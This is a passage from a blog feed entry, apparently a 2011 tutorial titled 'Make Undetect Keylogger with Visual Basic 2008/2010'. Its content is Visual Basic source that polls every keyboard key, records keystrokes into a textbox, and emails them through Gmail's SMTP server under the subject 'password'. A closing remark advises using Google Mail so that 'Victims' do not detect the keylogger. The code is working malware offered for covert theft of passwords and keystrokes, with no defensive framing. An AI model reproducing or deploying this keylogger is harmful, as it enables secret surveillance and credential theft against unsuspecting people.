#aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;Imports System.Net.Mail&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;*******************************************&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;Public Class Form1&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; Dim result As Integer&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; Private Declare Function GetAnyncKeySync Lib "user32" (ByVal vKey As Long) As Integer&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;*******************************************&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; For i = 1 To 255&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; result = 0&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; result = GetAsyncKeyState(i)&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; If result = -32767 Then&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; TextBox1.Text = TextBox1.Text + Chr(i)&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; End If&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Next i&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; End Sub&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; My.Computer.Clipboard.SetText("Haha")&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; End Sub&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Dim mail As New MailMessage()&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Dim SmtpServer As New SmtpClient&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; SmtpServer.Credentials = New Net.NetworkCredential("uremail@gmail.com", "password")&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; SmtpServer.Port = 587&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; SmtpServer.Host = "smtp.gmail.com"&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; SmtpServer.EnableSsl = True&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; SmtpServer.EnableSsl = True&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; mail.To.Add("uremail@anymailserver.com")&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; mail.From = New MailAddress("nothere-mail@gmail.com")&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; mail.Subject = "password"&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; mail.Body = TextBox1.Text&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; SmtpServer.Send(mail)&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #aaaaaa; font-family: Tahoma, Verdana, Arial;"&gt;&amp;nbsp; &amp;nbsp; End Sub&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Remember, You must use Google Mail Service or your Keylogger will Detect by Victims.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4138059781742552827-3909667500895821306?l=d3xt-my.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d3xt-my.blogspot.com/feeds/3909667500895821306/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/make-undetect-keylogger-with-visual.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/3909667500895821306'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/3909667500895821306'/><link rel='alternate' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/make-undetect-keylogger-with-visual.html' title='Make Undetect Keylogger with Visual Basic 2008/2010'/><author><name>Sprawd</name><uri>http://www.blogger.com/profile/08685941326590506202</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>